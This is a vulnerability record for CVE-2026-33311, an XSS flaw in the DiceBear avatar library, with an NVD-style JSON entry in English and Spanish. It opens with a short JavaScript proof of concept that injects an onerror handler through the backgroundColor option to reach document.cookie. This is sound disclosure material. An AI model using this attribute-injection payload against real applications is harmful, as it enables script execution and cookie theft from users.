CVE-2026-33311

// PoC Concept for CVE-2026-33311 // Target: DiceBear < 5.4.4, 6.1.4, etc. // Description: Injecting malicious JS via backgroundColor attribute const { createAvatar } = require('@dicebear/core'); const { avataaars } = require('@dicebear/collection'); // Malicious payload containing XSS payload // The closing quote (") closes the SVG attribute, and onerror injects the script const payload = 'red" onerror="alert(document.cookie)'; try { const avatar = createAvatar(avataaars, { backgroundColor: payload // Untrusted user input used directly }); const svg = avatar.toString(); console.log(svg); // The output SVG will look like: // <svg ...> <path fill="red" onerror="alert(document.cookie)" ... /> </svg> // When served with Content-Type: image/svg+xml, the alert executes. } catch (e) { console.error(e); }

{"cve": {"id": "CVE-2026-33311", "sourceIdentifier": "[email protected]", "published": "2026-03-24T14:16:30.290", "lastModified": "2026-03-24T19:19:30.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DiceBear is an avatar library for designers and developers. Starting in version 5.0.0 and prior to versions 5.4.4, 6.1.4, 7.1.4, 8.0.3, and 9.4.1, SVG attribute values derived from user-supplied options (`backgroundColor`, `fontFamily`, `textColor`) were not XML-escaped before interpolation into SVG output. This could allow Cross-Site Scripting (XSS) when applications pass untrusted input to `createAvatar()` and serve the resulting SVG inline or with `Content-Type: image/svg+xml`. Starting in versions 5.4.4, 6.1.4, 7.1.4, 8.0.3, and 9.4.1, all affected SVG attribute values are properly escaped using XML entity encoding. Users should upgrade to the listed patched versions. Some mitigating factors limit vulnerability. Applications that validate input against the library's JSON Schema before passing it to `createAvatar()` are not affected. The DiceBear CLI validates input via AJV and was not vulnerable. Exploitation requires that an application passes untrusted, unvalidated external input directly as option values."}, {"lang": "es", "value": "DiceBear es una biblioteca de avatares para diseñadores y desarrolladores. A partir de la versión 5.0.0 y antes de las versiones 5.4.4, 6.1.4, 7.1.4, 8.0.3 y 9.4.1, los valores de atributos SVG derivados de opciones proporcionadas por el usuario ('backgroundColor', 'fontFamily', 'textColor') no se escapaban en XML antes de la interpolación en la salida SVG. Esto podría permitir cross-site scripting (XSS) cuando las aplicaciones pasan entrada no confiable a createAvatar() y sirven el SVG resultante en línea o con Content-Type: image/svg+xml. A partir de las versiones 5.4.4, 6.1.4, 7.1.4, 8.0.3 y 9.4.1, todos los valores de atributos SVG afectados se escapan correctamente utilizando la codificación de entidades XML. Los usuarios deben actualizar a las versiones parcheadas listadas. Algunos factores mitigantes limitan la vulnerabilidad. Las aplicaciones que validan la entrada contra el esquema JSON de la biblioteca antes de pasarla a createAvatar() no se ven afectadas. La CLI de DiceBear valida la entrada a través de AJV y no era vulnerable. La explotación requiere que una aplicación pase entrada externa no confiable y no validada directamente como valores de opción."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dicebear:dicebear:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.4.4", "matchCriteriaId": "AB09AE0B-2C5F-42EE-B503-E6DB31F13097"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dicebear:dicebear:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.1.4", "matchCriteriaId": "91AF6F19-54B2-4B03-93BE-8CEE3924FCC6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dicebear:dicebear:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.1.4", "matchCriteriaId": "5CD34B76-4E52-474D-98B6-4BEE30C058FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dicebear:dicebear:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.3", "matchCriteriaId": "857BBBB9-784C-4EDB-BF7B-F07E277D7BE6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dicebear:dicebear:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.4.1", "matchCriteriaId": "E8FC8182-9B77-43A9-9178-E8ADF1409AA8"}]}]}], "references": [{"url": "https://github.com/dicebear/dicebear/security/advisories/GHSA-mr9r-mww3-v6gv", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}